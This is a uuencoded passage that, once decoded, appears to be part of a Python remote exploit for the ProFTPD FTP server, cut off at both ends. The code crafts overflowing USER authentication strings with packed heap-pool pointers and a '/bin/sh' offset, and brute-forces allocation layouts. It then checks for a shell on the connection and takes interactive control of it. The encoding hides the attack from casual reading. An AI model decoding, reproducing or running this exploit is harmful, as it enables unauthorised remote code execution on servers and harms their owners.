+M;&5N9W1H(#T@;&5N*&YA;64I"@H)9&5F(&UA:V5?=7-E<E]S=')I;F<H<V5L
+M9BP@;W9E<F9L;W=?86UO=6YT+"!C;VQU;6Y?;&5N9W1H+"!P861D:6YG/3`I
+M.@H)"2<G)PH)"6UA:V4@<F5T=7)N<R!A(%5S97)3=')I;F<@8VQA<W,@:6YI
+M=&EA;&EZ960@=VET:"!P87)A;65T97)S(&%B;W9E+@H)"0H)"6]V97)F;&]W
+M7V%M;W5N="!I;F1I8V%T97,@:&]W(&UU8V@L(&EF(&%N>2P@=&AE('1A<F=E
+M="!B=69F97(@<VAO=6QD(&)E"@D);W9E<G=R:71T96X@8GDN($EF(&ET(&ES
+M(#`L(&ET('=I;&P@<F5T=7)N(&$@<W1R:6YG('1H870@=7-E<PH)"6)E='=E
+M96X@,3`R-"!A;F0@-#`X,"!B>71E<RX*"0DG)R<*"@H)"71A9W,@/2!;("(E
+M;2(L("(E;"(L("(E9B(L("(E6B(L("(E5"(L(")!(B!="@D)=&%G7VQE;B`]
+M(&QE;BAT86=S*0D)"@H)"69O=6YD(#T@1F%L<V4*"0EA='1E;7!T<R`](#`@
+M"@H)"7=H:6QE(&YO="!F;W5N9#H*"0D)871T96UP=',@*ST@,0H)"0EC:')O
+M;6]S;VUE(#T@6UT*"0D)"@D)"6ET96US(#T@<F%N9&]M+G)A;F1I;G0H,"P@
+M,3`P*0H)"0EW:&EL92!I=&5M<SH*"0D)"6-H<F]M;W-O;64N87!P96YD*'1A
+M9W-;<F%N9&]M+G)A;F1I;G0H,"P@=&%G7VQE;BTQ*5TI"@D)"0EI=&5M<R`M
+M/2`Q"B`*"0D)(R!0<F]B86)L>2!U;BUN965D960L(&%S(#$P,"`J(#(@/"`R
+M-38N($)U="!)(&UI9VAT(&1E8VED92!T;R!C:&%N9V4*"0D)(R!S;VUE=&AI
+M;F<@;&%T97(@;VXL(&%N9"!T:&ES('=O=6QD('-E<G9E(&%S(&$@<W5I=&%B
+M;&4@<F5M:6YD960*"0D)87-S97)T*&QE;B@B(BYJ;VEN*&-H<F]M;W-O;64I
+M*2`\(#(U-BD*"@D)"6EF*&]V97)F;&]W7V%M;W5N="`]/2`P*3H*"0D)"6-H
+M<F]M;W-O;64N87!P96YD*'-E;&8N;7-F7W!A='1E<FY;.G!A9&1I;F==*0H*
+M"0D)"75S(#T@57-E<E-T<FEN9RAC:')O;6]S;VUE+"!O=F5R9FQO=U]A;6]U
+M;G0L(&-O;'5M;E]L96YG=&@I"@D)"0EI9BAU<RYL96YG=&@@/CT@,C`T."!A
+M;F0@=7,N;&5N9W1H(#P](#0P.#`I.@H)"0D)"69O=6YD(#T@5')U90H)"0D*
+M"0D)96QS93H*"0D)"6-H<F]M;W-O;64N87!P96YD*'-E;&8N;7-F7W!A='1E
+M<FY;.F]V97)F;&]W7V%M;W5N=%TI"@D)"0D*"0D)"75S(#T@57-E<E-T<FEN
+M9RAC:')O;6]S;VUE+"!O=F5R9FQO=U]A;6]U;G0L(&-O;'5M;E]L96YG=&@I
+M"@D)"0EI9BAU<RYL96YG=&@@/3T@-#`Y-B`K(&]V97)F;&]W7V%M;W5N="`K
+M(#(I.@H)"0D)"69O=6YD(#T@5')U90H*"0DC<')I;G0@(D9O=6YD(&EN("5D
+M(&%T=&5M<'1S(B`E(&%T=&5M<'1S"@D)(W!R:6YT('5S+F-H<F]M;W-O;64*
+M"@D)<F5T=7)N('5S"@H)9&5F(&-O;FYE8W0H<V5L9BDZ"@D))R<G"@D)8V]N
+M;F5C="!T;R!T:&4@<F5M;W1E(&AO<W0L(&%N9"!H86YD;&4@4U-,('-U<'!O
+M<G0@:68@<F5Q=65S=&5D+@H)"2<G)PH*"0EI9BAS96QF+G-K="DZ"@D)"71R
+M>3H*"0D)"7-E;&8N<VMT+G-E;F0H(E%5251<<EQN(BD*"0D)97AC97!T.@H)
+M"0D)<&%S<PH*"0D)<V5L9BYS:W0N8VQO<V4H*0H*"0ES:W0@/2!S;V-K970N
+M<V]C:V5T*"D*"0ET<GDZ"@D)"7-K="YC;VYN96-T*"AS96QF+FAO<W0L('-E
+M;&8N;W!T:6]N<RYP;W)T*2D*"0EE>&-E<'0@<V]C:V5T+F5R<F]R+"!E.@H)
+M"0EP<FEN="`B56YA8FQE('1O(&-O;FYE8W0@=&\@<F5M;W1E(&AO<W0@*"5S
+M*2(@)2!E+FUE<W-A9V4*"0D)<WES+F5X:70H,2D*"@D)8F%N;F5R(#T@<VMT
+M+G)E8W8H,3`P*2YS=')I<"@I"@H)"6EF*&YO="!B86YN97(I.@H)"0ES:W0N
+M8VQO<V4H*0H)"0ER971U<FX@1F%L<V4*"@D)<')I;G0@(ELK72!#;VYN96-T
+M960L(')E8VEE=F5D(%LE<UT@87,@=&AE(&)A;FYE<B(@)2!B86YN97(*"@D)
+M:68H;F]T('-E;&8N;W!T:6]N<RYS<VPI.@H)"0ES96QF+G-K="`]('-K=`H)
+M"0ER971U<FX@5')U90H*"0DC(%=R87`@<V]C:V5T"@H)"7-K="YS96YD*")!
+M551((%1,4UQR7&XB*0H)"7)E<W`@/2!S:W0N<F5C=B@U,#`I+G-T<FEP*"D*
+M"0EI9BAR97-P6SHS72`A/2`B,C,T(BDZ"@D)"7!R:6YT(")$:60@;F]T(&=E
+M="!/2R!S=&%T=7,@9F]R($%55$@@5$Q3(@H)"0EP<FEN="`B1V]T(%LE<UT@
+M:6YS=&5A9"(@)2!R97-P"@D)"7-K="YC;&]S92@I"@D)"7)E='5R;B!&86QS
+M90H)"0H)"7-E;&8N<VMT(#T@<W-L+G=R87!?<V]C:V5T*'-K="D*"0ES96QF
+M+G-K="YD;U]H86YD<VAA:V4H*0H)"0H)"7)E='5R;B!4<G5E"@H)9&5F(&1O
+M7V9A:V5?875T:"AS96QF+"!F86ME875T:'-T<BDZ"@D)<V5L9BYS:W0N<V5T
+M=&EM96]U="@Q,"XP*0H*"0EP<FEN="`B6RM=(%-E;F1I;F<@=7-E<B`N+B(L
+M"@D)<V5L9BYS:W0N<V5N9"@B55-%4B`E<UQR7&XB("4@9F%K96%U=&AS='(I
+M"@D)=')Y.@H)"0ER97-P(#T@<V5L9BYS:W0N<F5C=B@T,#`I+G-T<FEP*"D*
+M"0D):68H;F]T(')E<W`I.@H)"0D)<F5T=7)N($9A;'-E"@D)97AC97!T($5X
+M8V5P=&EO;BP@93H*"0D)<')I;G0@(G1O;VL@=&]O(&QO;F<L(')E='5R;FEN
+M9R`H)7,I(B`E("AE+FUE<W-A9V4I"@D)"7!R:6YT('1Y<&4H92D*"0D)<')I
+M;G0@9&ER*&4I"@D)"7)E='5R;B!&86QS90H*"0EP<FEN="`B<F5S<&]N<V4@
+M=V%S(%LE<UTB("4@<F4N<W5B*");7F$M>D$M6C`M.2`E+UTB+"`B+B(L(')E
+M<W`N<W1R:7`H*2D*"@D)<')I;G0@(ELK72!396YD:6YG('!A<W,@+BXB+`H)
+M"0H)"71R>3H*"0D)<V5L9BYS:W0N<V5N9"@B4$%34R!I;G9A;&ED7')<;B(I
+M"@D)"7)E<W`@/2!S96QF+G-K="YR96-V*#$P,"DN<W1R:7`H*0H)"0EI9BAN
+M;W0@<F5S<"DZ"@D)"0ER971U<FX@1F%L<V4*"0EE>&-E<'0@17AC97!T:6]N
+M+"!E.@H)"0EP<FEN="`B=&]O:R!T;V\@;&]N9RP@<F5T=7)N:6YG("@E<RDB
+M("4@*&4N;65S<V%G92D*"0D)<')I;G0@='EP92AE*0H)"0EP<FEN="!D:7(H
+M92D*"0D)<F5T=7)N($9A;'-E"@H)"7!R:6YT(")R97-P;VYS92!W87,@6R5S
+M72(@)2!R97-P"@D)<V5L9BYS:W0N<V5T=&EM96]U="@P*0H)"7)E='5R;B!4
+M<G5E"@H)9&5F(&-H96-K7V9O<E]B861?8VAA<G,H<V5L9BP@<W1R:6YG*3H*
+M"0DC(#PS('-E="!O<&5R871I;VYS"@D)<F5T=7)N('-E="@I(#T]("AS970H
+M<W1R:6YG*2`F('-E;&8N8F%D8VAA<G,I"@H)9&5F('-H96QL7VAA;F1L97(H
+M<V5L9BDZ"@D))R<G"@D)<VAE;&Q?:&%N9&QE<B!C:&5C:W,@=&\@<V5E(&EF
+M('=E(&AA=F4@82!R96UO=&4@<VAE;&P@;VX@<V]C:V5T+"!A;F0@:68@<V\L
+M(`H)"6%L;&]W<R!T:&4@=7-E<B!T;R!I;G1E<F9A8V4@=VET:"!I="X*"0DG
+M)R<*"@D)(R!7;W)K(&]U="!W:&%T('-K="!W92!S:&]U;&0@8F4@=7-I;F<*
+M"0EI9BAS96QF+F]P=&EO;G,N<W-L*3H*"0D)<VMT(#T@<V5L9BYS:W0N7W-O
+M8VL*"0D)<VMT+G-E=&)L;V-K:6YG*#$I"@D)96QS93H*"0D)<VMT(#T@<V5L
+M9BYS:W0*"@D)<FQI<W0L('=L:7-T+"!X;&ES="`]('-E;&5C="YS96QE8W0H
+M6W-K=%TL(%M=+"!;<VMT72P@,BXP*0H)"6EF*'-K="!I;B!R;&ES="!O<B!S
+M:W0@:6X@>&QI<W0I.@H)"0DC(%-O8VME="!I<R!P<F]B86)L>2!C;&]S960N
+M"@D)"7)E<W`@/2!S:W0N<F5C=B@U,#`I"@D)"6EF*&YO="!R97-P*3H*"0D)
+M"7)E='5R;B!&86QS90H)"0D*"0D):68H*')E<W!;,%T@/3T@(EQX,3<B(&%N
+M9"!S96QF+F]P=&EO;G,N<W-L*2!O<B!R97-P6S!=(#T]("(S(BDZ"@D)"0DC
+M(%1H:7,@:7,@:6YT97)E<W1I;F<N($DG=F4@;F]T:6-E9"!T:&%T(&EF('=E
+M(&=E="!A(')E<W!O;G-E+"!W92=V92!C;W)R=7!T960@=&AE(`H)"0D)(R!H
+M96%P(&5N;W5G:"!T:&%T(&]N92!M;W)E(&-O;6UA;F0@<VAO=6QD(&1O('1H
+M92!T<FEC:R`[*0H*"0D)"7!R:6YT(");*UT@0VQO<V4N(%1R>6EN9R!T;R!T
+M<FEG9V5R('9I82!005-3(&EN=F%L:60B"@D)"0ES96QF+G-K="YS96YD*")0
+M05-3(&EN=F%L:61<<EQN(BD*"0D)"71I;64N<VQE97`H,"XU*0H)"0EE;'-E
+M.B`*"0D)"7!R:6YT(");*UT@2&TN($=O="!;)7,N+ETL('5N97AP96-T961L
+M>2XN('1H:7,@=7-U86QL>2!M96%N<R!W92=R92!C;&]S92!T;R!G971T:6YG
+M(&$@<VAE;&P@.RDB("4@<F5S<"YE;F-O9&4H)VAE>"<I6SHQ,ET*"@D)"@H)
+M"7!R:6YT("=;*UT@0VAE8VMI;F<@9F]R('-H96QL+BXN)RP*"@D)=')Y.@H)
+M"0ES:W0N<V5N9"@B7&Y<;F5C:&\@1$].15QN(BD*"0D)<F5S<"`]('-K="YR
+M96-V*#(P*0H*"0D):68H<F5S<"YF:6YD*")$3TY%(BD@/3T@+3$I.@H)"0D)
+M<')I;G0@(FYO="!F;W5N9"P@9V]T(%LE<UT@:6YS=&5A9"(@)2`H<F5S<"YS
+M=')I<"@I+F5N8V]D92@G:&5X)RDI"@D)"0ER971U<FX@1F%L<V4*"0D)96QS
+M93H*"0D)"7!R:6YT("(@87!P96%R<R!W92!H879E(&=O="!A('-H96QL(@H*
+M"0EE>&-E<'0@<V]C:V5T+F5R<F]R+"!E.@H)"0EP<FEN="`G0V]N;F5C=&EO
+M;B!I;G1E<G)U<'1E9"`H)7(I)R`E(&4*"0D)<F5T=7)N"@H)"0H*"0ES:W0N
+M<V5N9"@B=6YS970@2$E35$9)3$5<;B(I"@D)(R!0<F]&5%!$('5S97,@<VEG
+M86QR;2!F;W(@<V-H961U;&EN9R!T:&EN9W,*"0ES:W0N<V5N9"@B=')A<"`G
+M)R!324=!3%)-7&XB*0H)"2,@4F5D:7)E8W0@<W1D:6X@=&\@<W1D;W5T('-O
+M('=E(&-A;B!S964@=VAE;B!W92!M86ME(&-L:2!E<G)O<G,*"0ES:W0N<V5N
+M9"@B97AE8R`R/B8Q7&XB*0H*"0DC($-L96%N('5P('-O;64@9FEL92!D97-C
+M<FEP=&]R<PH)"69O<B!I(&EN(')A;F=E*#,L(#$P*3H*"0D)<VMT+G-E;F0H
+M(F5X96,@)60^)BU<;B(@)2!I*0H*"0EP<FEN="`B6RM=(%-T87)T:6YG('-H
+M96QL+B!S:&]U;&0@8F4@86-T:79E(&%N9"!C;&5A;F5D('5P(@H*"0ET(#T@
+M=&5L;F5T;&EB+E1E;&YE="@I"@D)="YS;V-K(#T@<VMT"@D)="YI;G1E<F%C
+M="@I"@D)"@D)<F5T=7)N(%1R=64*"@ED968@;&]A9%]C86-H92AS96QF+"!T
+M87)G970I.@H)"6EF*'-E;&8N;W!T:6]N<RYI9VYO<F5?8V%C:&4I.@H)"0ER
+M971U<FX*"@D)=')Y.@H)"0ED871A(#T@;W!E;B@G)7,N8V%C:&4G("4@=&%R
+M9V5T6R=T>7!E)UTI+G)E860H*0H)"65X8V5P="!%>&-E<'1I;VXL(&4Z"@D)
+M"7!R:6YT("(E<B(@)2!E"@D)"7)E='5R;B!&86QS90H*"0ES96QF+F-A8VAE
+M(#T@<&EC:VQE+FQO861S*&1A=&$I"@H)9&5F('-A=F5?8V%C:&4H<V5L9BP@
+M=&%R9V5T+"!F86ME+"!T<FEG9V5R*3H*"0EI9BAS96QF+F]P=&EO;G,N:6=N
+M;W)E7V-A8VAE*3H*"0D)<F5T=7)N"@H)"6EF*&YO="!S96QF+F-A8VAE*3H*
+M"0D)<V5L9BYC86-H92`]('M]"@D)"@D):68H;F]T('-E;&8N8V%C:&4N:&%S
+M7VME>2AT87)G971;)VYA;64G72DI.@H)"0ES96QF+F-A8VAE6W1A<F=E=%LG
+M;F%M92==72`](%M="@H)"7-E;&8N8V%C:&5;=&%R9V5T6R=N86UE)UU=+F%P
+M<&5N9"@H9F%K92P@=')I9V=E<BDI"@H)"61A=&$@/2!P:6-K;&4N9'5M<',H
+M<V5L9BYC86-H92D*"@D)(W1R>3H*"0EF<"`](&]P96XH)R5S+F-A8VAE)R`E
+M('1A<F=E=%LG='EP92==+"`G=RLG*0H)"69P+G=R:71E*&1A=&$I"@D)9G`N
+M8VQO<V4H*0H)"2-E>&-E<'0@17AC97!T:6]N+"!E.@H)"2,)<F%I<V4*"@IC
+M;&%S<R!0<F]&5%!$7T]F9G-E=',H4')O1E101%]"87-I8W,I.@H)9&5F('1E
+M<W1?8V%C:&4H<V5L9BP@=&%R9V5T*3H*"0ES96QF+FQO861?8V%C:&4H=&%R
+M9V5T*0H*"0EI9BAS96QF+F-A8VAE(&%N9"!S96QF+F-A8VAE+FAA<U]K97DH
+M=&%R9V5T6R=N86UE)UTI*3H*"0D)<')I;G0@(ELK72!4<GEI;F<@)60@8V%C
+M:&5D('1R:6=G97(@:6YF;W)M871I;VX@9F]R("5S(B`E("AL96XH<V5L9BYC
+M86-H95MT87)G971;)VYA;64G75TI+"!T87)G971;)VYA;64G72D*"@D)"69O
+M<B!F86ME+"!T<FEG9V5R(&EN('-E;&8N8V%C:&5;=&%R9V5T6R=N86UE)UU=
+M.@H)"0D)<V5L9BYC;VYN96-T*"D*"0D)"6EF*&YO="!S96QF+F1O7V9A:V5?
+M875T:"AF86ME*2DZ"@D)"0D)<')I;G0@(ELK72!3;&5E<&EN9R!D=64@=&\@
+M<VAU=&1O=VXB"@D)"0D)=&EM92YS;&5E<"@Q,"D*"0D)"0EC;VYT:6YU90H*
+M"0D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<<EQN(B`E('1R:6=G97(I"0D)
+M"0H)"0D)<W5C8V5S<R`]('-E;&8N<VAE;&Q?:&%N9&QE<B@I"@D)"0EI9BAS
+M=6-C97-S*3H*"0D)"0EP<FEN="`B6RM=($-A8VAE9"!I;F9O<FUA=&EO;B!&
+M5%<B"@D)"0D)<F5T=7)N"@H)"0D)<')I;G0@(B()"0D)"@H)9&5F(')U;BAS
+M96QF+"!T87)G970I.@H)"7-E;&8N=&5S=%]C86-H92@I"@H)"7!R:6YT(");
+M*UT@0G)U=&5F;W)C:6YG(&UE;6]R>2!A;&QO8V%T:6]N<R!F;W(@)7,B("4@
+M=&%R9V5T6R=N86UE)UT*"@D)97AP;&]I=&5D(#T@1F%L<V4*"0EA='1E;7!T
+M<R`](#4W"@D)=VAI;&4H871T96UP=',I.@H)"0DC(%!I8VL@;VYE(&]F('1H
+M92!A=F%I;&%B;&4@;&5N9W1H<RX@5V4@9&]N)W0@;F5C97-S87)I;'D@:VYO
+M=R!H;W<@=&AE(')E;6]T90H)"0DC(&UA8VAI;F4@:7,@8V]N9FEG=7)E9"XN
+M(&QU8VMI;'D@=&AE<F4G<R!O;FQY('1W;R!C;VUM;VX@;VYE<R!))W9E('-E
+M96X*"0D)(R!U<V5R:60L(&%N9"!U<V5R;F%M92X@=7-E<FED(&ES('!R;V)A
+M8FQY('-L:6=H=&QY(&UO<F4@;&EK96QY('1H86X*"0D)(R!U<V5R;F%M92X*
+M"@D)"6-O;'5M;E]L96YG=&@@/2!R86YD;VTN8VAO:6-E*'-E;&8N=7-E<E]C
+M;VQU;6Y?;&5N9W1H<RD*"@D)"6EF*"AA='1E;7!T<R`E(#,I(#T](#`I.@H)
+M"0D)<')I;G0@(ELK72!'96YE<F%T:6YG('1R:6=G97(@875T:"(*"0D)"71R
+M:6=G97)A=71H(#T@<V5L9BYM86ME7W5S97)?<W1R:6YG*#0X+"!C;VQU;6Y?
+M;&5N9W1H*0H)"0D*"0D)86-C97!T86)L92`](#`*"0D)=VAI;&4H86-C97!T
+M86)L92`A/2`R*3H*"0D)"69A:V5A=71H(#T@<V5L9BYM86ME7W5S97)?<W1R
+M:6YG*#`L(&-O;'5M;E]L96YG=&@L(#,U*0H*"0D)"69I<G-T7V]F9G-E="`]
+M('1A<F=E=%LG<F5S<%]B=68G72`K(&QE;B@B4&%S<W=O<F0@<F5Q=6ER960@
+M9F]R("(I("L@;&5N*'-T<BAF86ME875T:"DI"@D)"0EA8V-E<'1A8FQE("`]
+M('-E;&8N8VAE8VM?9F]R7V)A9%]C:&%R<RAS=')U8W0N<&%C:R@B/$PB+"!F
+M:7)S=%]O9F9S970I*0H)"0D)86-C97!T86)L92`K/2!S96QF+F-H96-K7V9O
+M<E]B861?8VAA<G,H<W1R=6-T+G!A8VLH(CQ,(BP@9FER<W1?;V9F<V5T*S(X
+M*2D*"0D)"2-P<FEN="`B9FER<W1?;V9F<V5T.B`P>"4P.'@L(&%C8V5P=&%B
+M;&4Z("5R(B`E("AF:7)S=%]O9F9S970L(&%C8V5P=&%B;&4I"@H)"0ES96QF
+M+F-O;FYE8W0H*0H*"0D)9F%K95]S=')I;F<@/2!S='(H9F%K96%U=&@I"@D)
+M"69A:V5?<W1R:6YG("L](")!04%!(@D)"0D)"2,@9&%T80H)"0EF86ME7W-T
+M<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!T87)G971;)V]F9G-E="==*0D)
+M(R!C;&5A;G5P('!T<@H)"0EF86ME7W-T<FEN9R`K/2`B0D)"0B()"0D)"0DC
+M(&-H:6QD(&-L96%N=7`@<'1R"@H)"0EF86ME7W-T<FEN9R`K/2!S=')U8W0N
+M<&%C:R@B/$PB+"!T87)G971;)V5X96-V)UTI"0DC(&YE>'0@<&]I;G1E<B`O
+M(&-A;&P@,'@P8RXN"@D)"69A:V5?<W1R:6YG("L](")$1$1$(@D)"0D)"2,@
+M<&%D9&EN9PH)"0EF86ME7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!F
+M:7)S=%]O9F9S970K,C@I"0DC(&]F9G-E="!T;R`O8FEN+W-H"@D)"69A:V5?
+M<W1R:6YG("L]('-T<G5C="YP86-K*"(\3"(L('1A<F=E=%LG<F5S<%]B=68G
+M72LT,#`I"2,@;V9F<V5T('1O(%M.54Q,72!F;W(@97AE8W8*"0D)9F%K95]S
+M=')I;F<@*ST@(B]B:6XO<V@B"@D)"@H)"0EA<W-E<G0H;&5N*&9A:V5?<W1R
+M:6YG*2`]/2!L96XH<W1R*&9A:V5A=71H*2DK,S4I"@D)"6EF*&YO="!S96QF
+M+F1O7V9A:V5?875T:"AF86ME7W-T<FEN9RDI.@H)"0D)<')I;G0@(ELK72!3
+M;&5E<&EN9R!S:6YC92!S;V-K970@=V%S('-H=70@9&]W;B!D=7)I;F<@9F%K
+M92!A=71H(@H)"0D)=&EM92YS;&5E<"@Q,"D*"0D)"6-O;G1I;G5E"@H)"0EI
+M9BAS96QF+F]P=&EO;G,N<VQE97!?869T97)?8V]N;F5C="DZ"@D)"0EP<FEN
+M="`B6RM=(%-L965P:6YG(#4@<V5C;VYD<R!S;R!A(&1E8G5G9V5R(&-A;B!B
+M92!A='1A8VAE9"(*"0D)"71I;64N<VQE97`H-2D*"@D)"71R:6=G97)?<W1R
+M:6YG(#T@<W1R*'1R:6=G97)A=71H*0H*"0D)(R!&:7)S="`T(&1W;W)D<R!A
+M<F4@8FQO:PH*"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R=6-T+G!A8VLH(CQ,
+M(BP@=&%R9V5T6R=R97-P7V)U9B==*S0P,#`I"2,@:6X@8V%S92!W92!U<V4@
+M=&AI<R!F;W(@86QL;V-A=&EO;BXN('=E(&IU<W0*"0D)"0D)"0D)"0DC('=A
+M;G0@<V]M97=H97)E('=R:71A8FQE"@D)"71R:6=G97)?<W1R:6YG("L]('-E
+M;&8N;7-F7W!A='1E<FY;-#HX70H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S=')U
+M8W0N<&%C:R@B/$PB+"!T87)G971;)W)E<W!?8G5F)UTK,3(P,"D)(R!C86X@
+M8F4@:&ET(&EN(&)L;VL@8VQE86X@=7`@8V]D92X@<&]I;G0*"0D)"0D)"0D)
+M"0DC('-O;65W:&5R92!H87)M;&5S<R`*"@D)"71R:6=G97)?<W1R:6YG("L]
+M('-E;&8N;7-F7W!A='1E<FY;,3(Z,C1="@H)"0DC($YO=R!W92!H879E(&$@
+M<&]O;"!S=')U8W1U<F4@:&5R90H*"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R
+M=6-T+G!A8VLH(CQ,(BP@9FER<W1?;V9F<V5T*0D)(R!C;&5A;G5P('-T<G5C
+M='5R90H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!T
+M87)G971;)W)E<W!?8G5F)UTK,C`P,"D)(R!S=6)?<&]O;"`N+B!N97<@<&]O
+M;"!M:6=H="!B92!A;&QO8V%T960@:&5R90H)"0ET<FEG9V5R7W-T<FEN9R`K
+M/2!S=')U8W0N<&%C:R@B/$PB+"!T87)G971;)W)E<W!?8G5F)UTK-#`P*0DC
+M('-U8E]N97AT(`H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B
+M/$PB+"!T87)G971;)W)E<W!?8G5F)UTK-C`P*0DC('-U8E]P<F5V"@D)"71R
+M:6=G97)?<W1R:6YG("L]('-T<G5C="YP86-K*"(\3"(L('1A<F=E=%LG<F5S
+M<%]B=68G72LX,#`I"2,@<&%R96YT"@D)"71R:6=G97)?<W1R:6YG("L]('-T
+M<G5C="YP86-K*"(\3"(L('1A<F=E=%LG<F5S<%]B=68G72LQ,#`P*0DC(&9R
+M965?9FER<W1?879A:6P*"@D)"2-T<FEG9V5R7W-T<FEN9R`K/2`B04%!04)"
+M0D(B"@D)"2-T<FEG9V5R7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!T
+M87)G971;)W)E<W!?8G5F)UTK-#`P*0H)"0DC=')I9V=E<E]S=')I;F<@*ST@
+M(D1$1$0B"@D)"2-T<FEG9V5R7W-T<FEN9R`K/2`B04%!04)"0D)#0T-#1$1$
+M1$5%144B"@H)"0DC<')I;G0@=')I9V=E<E]S=')I;F<N96YC;V1E*"=H97@G
+M*0H*"0D)87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@;&5N*'-T<BAT
+M<FEG9V5R875T:"DI*S0X*0H)"@D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<
+M<EQN(B`E('1R:6=G97)?<W1R:6YG*0H*"0D):68H<V5L9BYS:&5L;%]H86YD
+M;&5R*"DI.@H)"0D)<')I;G0@(BTM=7-E<BUC;VQU;6XM;&5N9W1H/25D+"!F
+M86ME875T:"YL96YG=&@Z("5D+"!T<FEG9V5R875T:"YL96YG=&@Z("5D(B`E
+M("@*"0D)"0EC;VQU;6Y?;&5N9W1H+"!F86ME875T:"YL96YG=&@L('1R:6=G
+M97)A=71H+FQE;F=T:`H)"0D)*0H*"0D)"7-E;&8N<V%V95]C86-H92AT87)G
+M970L(&9A:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RD*"0D)"6)R96%K"@H)
+M"0EA='1E;7!T<R`M/2`Q"@D)"7!R:6YT("(B"@IC;&%S<R!0<F]&5%!$7T)R
+M=71E9F]R8V4H4')O1E101%]"87-I8W,I.@H)9&5F('1I;65I="AS96QF+"!F
+M86ME+"!T<FEG9V5R*3H*"0ES96QF+F-O;FYE8W0H*0H)"7-E;&8N9&]?9F%K
+M95]A=71H*&9A:V4I"@H)"7-T87)T(#T@=&EM92YT:6UE*"D*"0ES96QF+G-K
+M="YS96YD*")54T52("5S7')<;B(@)2!T<FEG9V5R*0H)"0H)"7)L:7-T+"!W
+M;&ES="P@>&QI<W0@/2!S96QE8W0N<V5L96-T*%MS96QF+G-K=%TL(%M=+"!;
+M<V5L9BYS:W1=+"`Q+C`I"@D)<W1O<"`]('1I;64N=&EM92@I"@D)<')I;G0@
+M<FQI<W0L('AL:7-T"@H)"7)E='5R;B!S=&]P("T@<W1A<G0*"@ED968@<F5P
+M;&%Y*'-E;&8L(&9A:V4L('1R:6=G97(I.@H)"7-E;&8N8V]N;F5C="@I"@D)
+M<V5L9BYD;U]F86ME7V%U=&@H9F%K92D*"0D*"0EP<FEN="`B4VQE97!I;F<@
+M<V\@=&AA="!Y;W4@8V%N(&%T=&%C:"!A(&1E8G5G9V5R(@H)"71I;64N<VQE
+M97`H-2D*"@D)<V5L9BYS:W0N<V5N9"@B55-%4B`E<UQR7&XB("4@=')I9V=E
+M<BD*"0ER;&ES="P@=VQI<W0L('AL:7-T(#T@<V5L96-T+G-E;&5C="A;<V5L
+M9BYS:W1=+"!;72P@6W-E;&8N<VMT72P@,2XP*0H)"0H*"61E9B!F:6YD7W1R
+M:6=G97)?<W1R:6YG*'-E;&8L(&-O;'5M;E]L96YG=&@I.@H)"7)E<W5L=',@
+M/2![?0H)"0H)"69O<B!I(&EN(')A;F=E*#`L(#,R*3H*"0D)9F]U;F0@/2!&
+M86QS90H)"0EW:&EL92AN;W0@9F]U;F0I.@H)"0D)=')I9V=E<F%U=&@@/2!S
+M96QF+FUA:V5?=7-E<E]S=')I;F<H,38L(&-O;'5M;E]L96YG=&@I"@D)"0ET
+M<FEG9V5R7W-T<FEN9R`]('-T<BAT<FEG9V5R875T:"D@*R!S96QF+FUS9E]P
+M871T97)N6SHQ-ET*"0D)"@D)"0EF86ME875T:"`]('-E;&8N;6%K95]U<V5R
+M7W-T<FEN9R@P+"!C;VQU;6Y?;&5N9W1H+"`P*0H)"0D)9F%K95]S=')I;F<@
+M/2!S='(H9F%K96%U=&@I(`H*"0D)"71I;6EN9R`]('-E;&8N=&EM96ET*&9A
+M:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RD*"0D)"7-T(#T@<W1R*'1I;6EN
+M9RD*"@D)"0EI9BAN;W0@<F5S=6QT<RYH87-?:V5Y*'-T*2DZ"@D)"0D)9F]U
+M;F0@/2!4<G5E"@H)"0ER97-U;'1S6W-T<BAT:6UI;F<I72`]("AF86ME7W-T
+M<FEN9RP@=')I9V=E<E]S=')I;F<I"@H)"6ME>7,@/2!R97-U;'1S+FME>7,H
+M*0H)"6ME>7,N<V]R="@I"@H)"7)E='5R;B!R97-U;'1S6VME>7-;,%U="@H)
+M9&5F(&9I;F1?<W1R:6YG<RAS96QF+"!T87)G970L('5C;"DZ"@D)<F5S=6QT
+M<R`]('M]"@D)<F5P;&%Y(#T@>WT*"@D)(R!E;F1P(#T@9FER<W1?879A:6P@
+M/2!N;W1H:6YG(&%V86EL86)L92!I;B!T:&ES(&)L;VLN('=E(&-O=6QD(&UA
+M:V4@:70*"0DC(#$P,"!B>71E<R!A=F%I;&%B;&4@:&5R92`N+@H)"7!B(#T@
+M4&]O;$)L;VLH=&%R9V5T6R=S=&]P)UTL('1A<F=E=%LG<W1O<"==("L@,C`P
+M+"!T87)G971;)W-T;W`G72`K(#$P,"P@,'@T,30R-#,T-"D*"0EP:"`](%!O
+M;VQ(96%D97(H"@D)"71A<F=E=%LG<W1O<"==+`H)"0ET87)G971;)W-T;W`G
+M72P*"0D),'@T,30Q-#$T,2P*"0D)=&%R9V5T6R=S=&]P)UT@*R`Q,#`L"@D)
+M"71A<F=E=%LG<W1O<"==+`H)"0ET87)G971;)W-T;W`G72`K(#$P,"P*"0D)
+M=&%R9V5T6R=S=&]P)UT@*R`Q,#`L"@D)"3!X9&5A9&)E968*"0DI"@H)"7!C
+M(#T@4&]O;$-L96%N=7`H,'AD96%D8F5E9BP@,'AD96%D8F5E9BP@,'AD96%D
+M8F5E9BP@,'AD96%D8F5E9BD*"@D);W9E<G=R:71E7VQE;B`](&QE;BAS='(H
+M<&(I("L@<W1R*'!H*2D*"@D)9F%K95]L96X@(#T@;&5N*%!O;VQ#;&5A;G5P
+M*#!X8F%B96)A8F4L(#!X8F%B96)A8F4L(#!X8F%B96)A8F4L(#!X8F%B96)A
